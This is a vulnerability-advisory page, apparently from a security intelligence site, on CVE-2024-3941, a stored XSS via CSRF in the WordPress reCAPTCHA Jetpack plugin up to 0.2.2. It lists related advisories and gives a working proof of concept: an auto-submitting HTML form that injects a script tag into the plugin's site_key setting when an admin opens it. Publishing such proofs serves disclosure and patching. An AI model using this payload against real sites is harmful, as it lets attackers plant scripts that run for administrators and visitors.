reCAPTCHA Jetpack 0.2.2 XSS CSR
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | WordPress reCAPTCHA Jetpack Plugin <= 0.2.2 is vulnerable to Cross Site Request Forgery (CSRF) | 15 May 202400:00 | โ | patchstack |
![]() | CVE-2024-3941 reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF | 10 May 202406:00 | โ | vulnrichment |
![]() | CVE-2024-3941 reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF | 10 May 202406:00 | โ | cvelist |
![]() | CVE-2024-3941 | 14 May 202415:42 | โ | nvd |
![]() | reCAPTCHA Jetpack <= 0.2.2 - Stored XSS via CSRF | 19 Apr 202400:00 | โ | wpvulndb |
![]() | CVE-2024-3941 | 14 May 202415:42 | โ | cve |
![]() | Wordfence Intelligence Weekly WordPress Vulnerability Report (April 15, 2024 to April 21, 2024) | 25 Apr 202415:56 | โ | wordfence |
This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.
Add a post/page containing a Jetpack Contact Form shortcode:
```
[contact-form][contact-field label="Name" type="name" required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```
Once there is a form using Jetpack, make a logged in admin open an HTML document containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
<input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
<input type="hidden" name="secret_key" value='csrf2222' />
<input type="hidden" name="recaptcha_type" value="v2" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" name="enter" id="enter" value="Submit">
</form>
</body>
```
View the post/page containing the form and see the XSS
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo